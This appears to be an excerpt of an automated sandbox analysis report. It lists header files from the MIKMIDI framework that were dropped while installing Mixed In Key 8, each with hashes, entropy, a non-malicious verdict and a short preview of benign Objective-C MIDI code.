                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIConnectionManager.h.// MIKMIDI.//.// Created by Andrew Madsen on 11/5/15..// Copyright .. 2015 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import "MIKMIDICompilerCompatibility.h".#import "MIKMIDISourceEndpoint.h"..@class MIKMIDIDevice;.@class MIKMIDINoteOnCommand;..@protocol MIKMIDIConnectionManagerDelegate;..NS_ASSUME_NONNULL_BEGIN../**. * MIKMIDIConnectionManager can be used to manage a set of connected devices. It can be configured to automatically. * connect to devices as they are added, and disconnect from them as they are removed. It also supports saving. * the list of connected to NSUserDefaults and restoring them upon relaunch.. *. * The use of MIKMIDIConnectionManager is optional. It is meant to be useful in implementing functionality that. * many MIDI device enabled apps need. However, simple connection to devices or MIDI endpoints can be done with. * MIKMIDIDeviceManager directly, if desired.. */.@interface MIKMIDIConnecti
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_GM0BKr
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode C++ program text
                                                                                                    Size (bytes):1728
                                                                                                    Entropy (8bit):4.966864238788254
                                                                                                    Encrypted:false
                                                                                                    MD5:6B81DBB2125DFA905D4037D5223D075C
                                                                                                    SHA1:45B5E71F4E55D5A8C9544843168C79FE69E8AB1C
                                                                                                    SHA-256:D3767F425F587448BBB0BD01AE829A9C3BAF4FF3C980BBA3352AF502EBFA327C
                                                                                                    SHA-512:D8CA134C2E3838E85B290C8049A9207B0C6DE62C13CAABD102C848B8EA924D77616F220E06FAAAA2953CBFF5A804C5E7EAD6D7FB68539B948DFC9E22C17D3B49
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIChannelPressureCommand.h.// MIKMIDI.//.// Created by Andrew Madsen on 11/12/15..// Copyright .. 2015 Mixed In Key. All rights reserved..//..#import "MIKMIDIChannelVoiceCommand.h".#import "MIKMIDIChannelPressureCommand.h"..NS_ASSUME_NONNULL_BEGIN../**. * A MIDI channel pressure message. This message is most often sent by pressing. * down on the key after it "bottoms out". This differs from a MIKMIDIPolyphonicKeyPressureCommand. * in that is the single greatest pressure of all currently depressed keys, hence the lack. * of a note property.. */.@interface MIKMIDIChannelPressureCommand : MIKMIDIChannelVoiceCommand../**. Convenience method for creating a channel pressure command... @param pressure The pressure for the command. Must be between 0 and 127. @param channel The channel for the command. Must be between 0 and 15.. @param timestamp The timestamp for the command. Pass nil to use the current date/time.. @return An initialized MIKMIDIChannelPressureCommand instance
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_GSzyQV
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):701
                                                                                                    Entropy (8bit):5.2060758756514955
                                                                                                    Encrypted:false
                                                                                                    MD5:50765118E1B564B7073C310E29B55B0A
                                                                                                    SHA1:5EEFBEBCA19D98CFC1A4591EEFA8C86A9A32436B
                                                                                                    SHA-256:0023B68849FE6AE4555873C032A1537D12E5A01927B27E32AEB83D1C664FF9AC
                                                                                                    SHA-512:63C0829EB6F9392CDA7B6F31BBC285C8BC1555FB803D1234CA6E1520BB1DBAF73D4599B0E88641A8FE6095E206E954D80EE58B548B5940711F5A37E011F52E0E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIPort.h.// MIDI Testbed.//.// Created by Andrew Madsen on 3/8/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import "MIKMIDIObject.h".#import <CoreMIDI/CoreMIDI.h>.#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDIEndpoint;..NS_ASSUME_NONNULL_BEGIN../**. * MIKMIDIPort is an Objective-C wrapper for CoreMIDI's MIDIPort class. It is not intended for use by clients/users of. * of MIKMIDI. Rather, it should be thought of as an MIKMIDI private class.. */.@interface MIKMIDIPort : NSObject..- (nullable instancetype)initWithClient:(MIDIClientRef)clientRef name:(NSString *)name;..@property (nonatomic, readonly) MIDIPortRef portRef;..@end..NS_ASSUME_NONNULL_END
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_HkUqfo
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):4187
                                                                                                    Entropy (8bit):4.928890285312041
                                                                                                    Encrypted:false
                                                                                                    MD5:133D052B03E08C189BD062410A53F504
                                                                                                    SHA1:FC52B68CB9DEEF54D1AC608A069EB0FCF7D77323
                                                                                                    SHA-256:D7966502BD8E205BDD6AA773D09228F7560D8082D05AFD5349C673E71394C5BE
                                                                                                    SHA-512:EAF9FDABF08CEE58B2048E18C769913414D081BE1F3B125FE4D69ED6DFE1E445404D4895C4E988AE16DDDF2F73C5832DC6257B4CB3A889A580AD908BC564D0AD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIMetadataEvent.h.// MIDI Files Testbed.//.// Created by Jake Gundersen on 5/22/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import "MIKMIDIEvent.h".#import "MIKMIDICompilerCompatibility.h"..static const NSUInteger MIKMIDIEventMetadataStartOffset = 8;../**. * Subtypes of MIKMIDIMetaEvent. You should use the corresponding meta subtypes in MIKMIDIEventType when. * initializing an event with -initWithTimeStamp:midiEventType:data: or similar methods.. *. * The reason for a separate enum here, even though there is a 1 to 1 correspondence with values in . * MIKMIDIEventType is that these values are dictated by the MIDI standard, and overlap values defined. * for MusicEventType. Having these separately defined allows us to effectively "flatten" MIKMIDIEventType. * to treat meta event subtypes as first class event types.. */.typedef NS_ENUM(UInt8, MIKMIDIMetaEventType).{..MIKMIDIMetaEventTypeSequenceNumber = 0x00,..MIKMIDIMetaEventTypeTextEven
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_IfJUut
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):2278
                                                                                                    Entropy (8bit):4.9893869199148435
                                                                                                    Encrypted:false
                                                                                                    MD5:4F7FBA098972D3FCD295AB1E6918D81C
                                                                                                    SHA1:8224E34636B02BEBD76A1014F2BD1CC91A382DAD
                                                                                                    SHA-256:6438B56E3F28E3A4BF06F305CA0DB6D596078F1677992C53BA5E8626D68CAF44
                                                                                                    SHA-512:879D8BE5DF6905B57DE7024F683A523E98009642DC4805932C8086F82FD83D7FEB75D780DE62BAD4E928B2399B0D1E9D93A5705ED6C9EC3705E7604940F255A8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDISynthesizerInstrument.h.// MIKMIDI.//.// Created by Andrew Madsen on 2/19/15..// Copyright (c) 2015 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import <AudioToolbox/AudioToolbox.h>.#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../**. * MIKMIDISynthesizerInstrument is used to represent. */.@interface MIKMIDISynthesizerInstrument : NSObject../**. * Creates and initializes an MIKMIDISynthesizerInstrument with the corresponding instrument ID.. *. * @param instrumentID The MusicDeviceInstrumentID for the desired MIKMIDISynthesizerInstrument. * @param name The human readable name of the instrument. . *. * @return A MIKMIDISynthesizerInstrument instance with the matching instrument ID, or nil if no instrument was found.. */.+ (nullable instancetype)instrumentWithID:(MusicDeviceInstrumentID)instrumentID name:(nullable NSString *)name;../**. * The human readable name of the receiver. e.g. "Piano 1".. */.@property (n
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_J1arIk
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode C++ program text
                                                                                                    Size (bytes):1676
                                                                                                    Entropy (8bit):4.91536557145414
                                                                                                    Encrypted:false
                                                                                                    MD5:FFB7BB345380695B28D7ED26366DE0CD
                                                                                                    SHA1:EC09F4E282095FB490362149C0A89AB5798FE877
                                                                                                    SHA-256:093CB9E53FF073F954C3E500944B25AAC73F712201AEEF85E03073D7E81DB278
                                                                                                    SHA-512:734362EF038AC2909FF1C9EA2B2CE290CD7ED5A40E520036E976D53039F71284D963CA34DD09763CEBD5CD02A2CD9F856D4AFF77AD824CF44DEA8CEA34EB7D6C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDISystemKeepAliveCommand.h.// MIKMIDI.//.// Created by Andrew Madsen on 11/9/17..// Copyright .. 2017 Mixed In Key. All rights reserved..//..#import "MIKMIDISystemMessageCommand.h"..NS_ASSUME_NONNULL_BEGIN../**. * A MIDI System Keep Alive message (aka Active Sensing).. * Keep alive messages are sent repeatedly. * to tell the receiver of them that the MIDI connection is alive and working.. * Not all devices will send these at all.. *. * Per the MIDI spec, if a device *does* receive a keep alive message, it should. * expect to receive another no more than 300 ms later. If it does not, it can. * assume the connection has been terminated, and turn off all currently active. * voices/notes.. *. * Note that MIKMIDI doesn't (currently) implement this behavior at all, and it. * is up to MIKMIDI clients to implement it if so desired.. */.@interface MIKMIDISystemKeepAliveCommand : MIKMIDISystemMessageCommand.../**. * Convenience method for creating a keep alive command,
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_JcA1M1
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):5094
                                                                                                    Entropy (8bit):4.946165813490842
                                                                                                    Encrypted:false
                                                                                                    MD5:543C5B02AF963A9D4696062EBB2CD2F7
                                                                                                    SHA1:D3FCFA7EA96458029DB3776B1DE7AFA0FDECB4A9
                                                                                                    SHA-256:91E9692CB0219D194FA89A51520D514FD9928024DBEA92B2FBDB0FDA32D66502
                                                                                                    SHA-512:BAF54C744FFCC0A605EBC010EE8136C4A299ADFA910E857BEB7F8146433F9E4037D92E541906441C470BDF152C9123152A1654C90A891FFAB2DDE2AAB67DB3F9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// NSApplication+MIKMIDI.h.// Energetic.//.// Created by Andrew Madsen on 3/11/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import <TargetConditionals.h>..#if TARGET_OS_IPHONE..#import <UIKit/UIKit.h>.#define MIK_APPLICATION_CLASS UIApplication.#define MIK_WINDOW_CLASS UIWindow.#define MIK_VIEW_CLASS UIView..#else..#import <Cocoa/Cocoa.h>.#define MIK_APPLICATION_CLASS NSApplication.#define MIK_WINDOW_CLASS NSWindow.#define MIK_VIEW_CLASS NSView..#endif..#import "MIKMIDICompilerCompatibility.h"../**. * Define MIKMIDI_SEARCH_VIEW_HIERARCHY_FOR_RESPONDERS as a non-zero value to (re)enable searching. * the view hierarchy for MIDI responders. This is disabled by default because it's slow.. *. * @deprecated This feature still works, but its use is discouraged. It is deprecated and may be removed in the future.. */.//#define MIKMIDI_SEARCH_VIEW_HIERARCHY_FOR_RESPONDERS 0..@protocol MIKMIDIResponder;..@class MIKMIDICommand;..NS_ASSUME_NONNULL_BEGIN../**. * MIKMI
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_Jhi0ui
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):3910
                                                                                                    Entropy (8bit):4.876644679032012
                                                                                                    Encrypted:false
                                                                                                    MD5:3C893A6644013E1F86B49CAB09CD8731
                                                                                                    SHA1:527A1D8F8692C374BA5D1A814E6C2B0B424BBAAD
                                                                                                    SHA-256:6C44EEA770AAFDFA126C07DE7A6B86FCDB3E6EE7E99B5BCA79D74C40A71AC612
                                                                                                    SHA-512:0652942DA3E3EED58EA902095B428F171B3829321289D6459CA2C1DB064AA4D33D51EA893AA3DBCADC8FC70AF0AF792D9DAF210A7064E39A199FAAE96453C75B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIEvent_SubclassMethods.h.// MIDI Files Testbed.//.// Created by Jake Gundersen on 5/21/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import "MIKMIDIEvent.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN..@interface MIKMIDIEvent ()../**. * Registers a subclass of MIKMIDIEvent. Registered subclasses will be instantiated and returned. * by +[MIKMIDIEvent ] for events they support.. *. * Typically this method should be called in the subclass's +load method.. *. * @note If two subclasses support the same event type, as determined by calling +supportsMIDIEvent:. * which one is used is undefined.. *. * @param subclass A subclass of MIKMIDIEvent.. */.+ (void)registerSubclass:(Class)subclass;../**. * Subclasses of MIKMIDIEvent must override this method, and return the MIKMIDIEventType. * values they support. MIKMIDIEvent uses this method to determine which. * subclass to use to represent a particular MIDI Event type.. *. * Note t
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_LuF5rS
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):839
                                                                                                    Entropy (8bit):5.079193431455825
                                                                                                    Encrypted:false
                                                                                                    MD5:9146BDEAC6D8C8490568328E6C2FD6E1
                                                                                                    SHA1:5C203CB78FADDD4E9E570B31B20F17C9C121A5D6
                                                                                                    SHA-256:8434B9FD06093254B25F26870216A21EBCD892853A0CFC4E5248EF973AC49D62
                                                                                                    SHA-512:D318ED72E43169E28CAB0BB82425BB4D1512D226C51B3046572E25408D6691EA98C22D47DC2B10DA31A1F6C32BA94EBAF4DAFA5593D6276F837734CAAE6132E0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIEndpoint.h.// MIDI Testbed.//.// Created by Andrew Madsen on 3/7/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import "MIKMIDIObject.h".#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDIEntity;..NS_ASSUME_NONNULL_BEGIN../**. * Base class for MIDI endpoint objects. Not used directly, rather, in use, instances will always be. * instances of MIKMIDISourceEndpoint or MIKMIDIDestinationEndpoint.. */.@interface MIKMIDIEndpoint : MIKMIDIObject../**. * The entity that contains the receiver. Will be nil for non-wrapped virtual endpoints.. */.@property (nonatomic, weak, readonly, nullable) MIKMIDIEntity *entity;../**. * Whether or not the endpoint is private or hidden. See kMIDIPropertyPrivate in MIDIServices.h.. */.@property (nonatomic, readonly) BOOL isPrivate;..@end..NS_ASSUME_NONNULL_END
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_ME6s64
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):16430
                                                                                                    Entropy (8bit):4.902851055273436
                                                                                                    Encrypted:false
                                                                                                    MD5:7B5B40BEFFB5669E8E522937FB28C715
                                                                                                    SHA1:63C221C65959B045C5F8847B73B96770EDCB8EEF
                                                                                                    SHA-256:496683693EDF28F0CAE3C3BC029EB9E4EDC78EF3254100AB9BD752E487236E1F
                                                                                                    SHA-512:1ED481709425B425AF002332FD4F64A39E2059A08B7D23132C7823E8EC60F0EF5F62A67C4FEE31E708CBAD8CF8C86D8B076F5D5234364CB2D97DDEDBFE618CBD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDISequencer.h.// MIKMIDI.//.// Created by Chris Flesner on 11/26/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import <Foundation/Foundation.h>.#import <AudioToolbox/AudioToolbox.h>.#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDISequence;.@class MIKMIDITrack;.@class MIKMIDIMetronome;.@class MIKMIDICommand;.@class MIKMIDIDestinationEndpoint;.@class MIKMIDISynthesizer;.@class MIKMIDIClock;.@protocol MIKMIDICommandScheduler;../**. * Types of click track statuses, that determine when the click track will be audible.. *. * @see clickTrackStatus. */.typedef NS_ENUM(NSInteger, MIKMIDISequencerClickTrackStatus) {../** The click track will not be heard during playback or recording. */..MIKMIDISequencerClickTrackStatusDisabled,../** The click track will only be heard while recording. */..MIKMIDISequencerClickTrackStatusEnabledInRecord,../** The click track will only be heard while recording and while the playback position is still in the pre-roll. */
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_MQ7O2I
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):1000
                                                                                                    Entropy (8bit):5.076988021740814
                                                                                                    Encrypted:false
                                                                                                    MD5:C903C5E7676BDF005CC30BA323A0E534
                                                                                                    SHA1:9CBD60BF14D7E2EEDD36FB2C43F5A850B7217F7F
                                                                                                    SHA-256:A1CC183A12C43973614D19D8FA5BD11AC1E671CEADA8C508CCBBF6DA5D018B20
                                                                                                    SHA-512:DE9C761775FC3B5E8458A601661C446820A562EFD66D743DA14E9BDAF0E3EF794D929FAD5DC3DE5FF1974EDD0E5D6D7AF4D4B4ABA225F3FED5267B3D7E61D76F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDISystemMessageCommand.h.// MIDI Testbed.//.// Created by Andrew Madsen on 6/2/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import "MIKMIDICommand.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../**. * A MIDI system message command. This class is also the base class for. * subclasses representing specific system message subtypes (e.g. SysEx).. */.@interface MIKMIDISystemMessageCommand : MIKMIDICommand..@end../**. * Mutable counterpart for MIKMIDISystemMessageCommand.. */.@interface MIKMutableMIDISystemMessageCommand : MIKMIDISystemMessageCommand..@property (nonatomic, strong, readwrite) NSDate *timestamp;.@property (nonatomic, readwrite) MIKMIDICommandType commandType;.@property (nonatomic, readwrite) UInt8 dataByte1;.@property (nonatomic, readwrite) UInt8 dataByte2;..@property (nonatomic, readwrite) MIDITimeStamp midiTimestamp;.@property (nonatomic, copy, readwrite, null_resettable) NSData *data;..@end..NS_ASSUME_NONNULL_END
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_MqdRIP
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode C++ program text
                                                                                                    Size (bytes):1472
                                                                                                    Entropy (8bit):5.312025313430408
                                                                                                    Encrypted:false
                                                                                                    MD5:8809BECAACE923A847B307AA405FBE7C
                                                                                                    SHA1:DF1595EB6629356FDEE8C1E84B9B38B25F014C3A
                                                                                                    SHA-256:0A3EB02E840EADDD70A53DA9DF5F3E8F1F50FEEB7B3E9BD6AC1AF40B838BFED4
                                                                                                    SHA-512:BF5A722707BD505AEB1233A53E680FB68FB5E17F021815F4408787CE741C55A6A5725D99A12C62B53E03D10035B466A32397B0CA603E3580CB3CADD89C2BD9B7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDICompilerCompatibility.h.// MIKMIDI.//.// Created by Andrew Madsen on 11/4/15..// Copyright .. 2015 Mixed In Key. All rights reserved..//../*. This header contains macros used to adopt new compiler features without breaking support for building MIKMIDI. with older compiler versions.. */..// Keep older versions of the compiler happy.#ifndef NS_ASSUME_NONNULL_BEGIN.#define NS_ASSUME_NONNULL_BEGIN.#define NS_ASSUME_NONNULL_END.#define nullable.#define nonnullable.#define __nullable.#endif..#ifndef MIKArrayOf.#if __has_feature(objc_generics)..#define MIKArrayOf(TYPE) NSArray<TYPE>.#define MIKArrayOfKindOf(TYPE) NSArray<__kindof TYPE>..#define MIKMutableArrayOf(TYPE) NSMutableArray<TYPE>..#define MIKSetOf(TYPE) NSSet<TYPE>.#define MIKMutableSetOf(TYPE) NSMutableSet<TYPE>..#define MIKMapTableOf(KEYTYPE, OBJTYPE) NSMapTable<KEYTYPE, OBJTYPE>..#else..#define MIKArrayOf(TYPE) NSArray.#define MIKArrayOfKindOf(TYPE) NSArray..#define MIKMutableArrayOf(TYPE) NSMutableArray..#define
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_OOM5aM
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):1076
                                                                                                    Entropy (8bit):5.045084983122784
                                                                                                    Encrypted:false
                                                                                                    MD5:FCE4F61D0E51AFF2C6B5C6AEA3687FD3
                                                                                                    SHA1:C21529C41BA2321FE47A928EAC3B4A7B7CE82660
                                                                                                    SHA-256:526C62C77D3A6E68F5AA4E65FB4FABC16E2A4598260BE066A1D9696E1CE192CA
                                                                                                    SHA-512:9A2693089FF052DAD1B7E5101475759D1E2EE3DC2D7ADFE63B81E732FEBB910B6172CE796D7B283AAE777C7A2E2BD0AB9CCCC4A05B581455E66EE73147657A31
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDITempoEvent.h.// MIDI Files Testbed.//.// Created by Andrew Madsen on 5/22/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import "MIKMIDIEvent.h".#import "MIKMIDICompilerCompatibility.h"..NS_ASSUME_NONNULL_BEGIN../** . * A MIDI tempo event.. */.@interface MIKMIDITempoEvent : MIKMIDIEvent../**. * Creates and initializes a new MIKMIDITempoEvent.. *. * @param timeStamp The time stamp for the tempo event.. *. * @param bpm The beats per minute of the tempo event.. *. * @return A new instance of MIKMIDITempoEvent. */.+ (instancetype)tempoEventWithTimeStamp:(MusicTimeStamp)timeStamp tempo:(Float64)bpm;../**. * The beats per minute of the tempo event.. */.@property (nonatomic, readonly) Float64 bpm;..@end../**. * The mutable counterpart of MIKMIDITempoEvent.. */.@interface MIKMutableMIDITempoEvent : MIKMIDITempoEvent..@property (nonatomic, readwrite) MusicTimeStamp timeStamp;.@property (nonatomic, strong, readwrite, null_resettable) NSMutableData *data
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_PRqdX1
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode C++ program text
                                                                                                    Size (bytes):4363
                                                                                                    Entropy (8bit):5.023426222794968
                                                                                                    Encrypted:false
                                                                                                    MD5:07DA1A11C9DB7F2BD423986729CF2047
                                                                                                    SHA1:6B76222005B0CD9F7F3C7D996C4E856C3CB7639E
                                                                                                    SHA-256:94E0F264A1F3E2A3DD0BBAB809A940899121AE6EBE39430AA25DC9C3920DE492
                                                                                                    SHA-512:346491A44CEDAFD7940D07446CCFBC9D8817419C03BDB795D52DB0A6CD4BB283F1EC56BE436EFB5A9AD9AAD2B1FA249B171B140DD5D7A0FE3B79B8EBE24B7EBE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDIEventMIDINoteMessage.h.// MIDI Files Testbed.//.// Created by Jake Gundersen on 5/21/14..// Copyright (c) 2014 Mixed In Key. All rights reserved..//..#import "MIKMIDIEvent.h".#import "MIKMIDICompilerCompatibility.h"..@class MIKMIDIClock;..NS_ASSUME_NONNULL_BEGIN../**. * A MIDI note event.. */.@interface MIKMIDINoteEvent : MIKMIDIEvent../**. * Convenience method for creating a new MIKMIDINoteEvent.. *. * @param timeStamp A MusicTimeStamp value indicating the timestamp for the event.. * @param note The note number for the event, from 0 to 127. 60 is middle C.. * @param velocity A number from 0-127 specifying the velocity of the note.. * @param duration The duration of the event in MusicTimeStamp units.. * @param channel The channel on which the MIDI event should be sent.. *. * @return An initialized MIKMIDINoteEvent instance, or nil if an error occurred.. */.+ (instancetype)noteEventWithTimeStamp:(MusicTimeStamp)timeStamp......... note:(UInt8)note......
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_PZFTiV
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):3779
                                                                                                    Entropy (8bit):4.980163778337072
                                                                                                    Encrypted:false
                                                                                                    MD5:03E868533D8693EE20F7690AA853A792
                                                                                                    SHA1:95A52DFD0B85EDE83B6E9EEAFB7D297656B919B6
                                                                                                    SHA-256:CF3E85F290B0BE4021948D982ECFF3E81B72CD8C2274F216C4D1B6A50628B489
                                                                                                    SHA-512:061192E4BEA8A7717B0004CC76C4EF8F48F119D1C3E0999512E2A86B71728228ABC3466CD35BD2BD0A194419EA79DDDBAFB02DB53ED241A5627367AB4033DFF3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKMIDISystemExclusiveCommand.h.// MIDI Testbed.//.// Created by Andrew Madsen on 6/2/13..// Copyright (c) 2013 Mixed In Key. All rights reserved..//..#import "MIKMIDISystemMessageCommand.h".#import "MIKMIDICompilerCompatibility.h"..#define kMIKMIDISysexNonRealtimeManufacturerID 0x7E.#define kMIKMIDISysexRealtimeManufacturerID 0x7F..#define kMIKMIDISysexChannelDisregard 0x7F.#define kMIKMIDISysexBeginDelimiter 0xF0.#define kMIKMIDISysexEndDelimiter 0xF7..NS_ASSUME_NONNULL_BEGIN../**. * A MIDI System Exclusive (SysEx) message. System exclusive messages are. * messages defined by individual manufacturers of MIDI devices. They. * can contain arbitrary data and can be used to support commands and responses. * not explicitly supported by the standard portion of MIDI spec. There are also. * some "Universal Exclusive Mesages", which while a type of SysEx message,. * are not manufacturer/device specific.. */.@interface MIKMIDISystemExclusiveCommand : MIKMIDISystemMessageCommand
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_R8sZtk
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):1243
                                                                                                    Entropy (8bit):5.084282715173978
                                                                                                    Encrypted:false
                                                                                                    MD5:9566A86B1B76618BFF676EF5D23771F8
                                                                                                    SHA1:D84B92870600A80322AF5CA661CC12A632473762
                                                                                                    SHA-256:471C294B8B9D45A7412A6EF882E9B042607732867717FB5E1F22DA10046B2537
